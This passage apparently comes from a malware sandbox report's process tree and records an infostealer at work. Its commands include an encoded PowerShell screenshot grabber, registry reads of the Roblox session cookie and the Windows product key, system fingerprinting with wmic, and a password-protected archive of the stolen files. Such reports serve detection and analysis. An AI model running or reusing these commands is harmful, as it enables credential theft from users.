        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ltiob2c\3ltiob2c.cmdline"
        6⤵
        
        PID:2332
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8E0.tmp" "c:\Users\Admin\AppData\Local\Temp\3ltiob2c\CSC7389049858BA4C9CB96698714B98F0D8.TMP"
        7⤵
        
        PID:4184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3760
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:2180
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4948
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:2928
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4496
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3052
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3960
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1812
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4080
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3244
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:3700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\oAObs.zip" *"
      4⤵
      PID:1800
    - - C:\Users\Admin\AppData\Local\Temp\_MEI30322\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI30322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\oAObs.zip" *
        5⤵
        Executes dropped EXE
        
        PID:3644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:4808
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1540
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:2312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3460
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:5064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:576
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1008

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1844

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://taskmanager/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f37d3cb8,0x7ff8f37d3cc8,0x7ff8f37d3cd8
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:1412
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3908 /prefetch:8
  2⤵
  PID:1168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:2864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4012 /prefetch:2
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
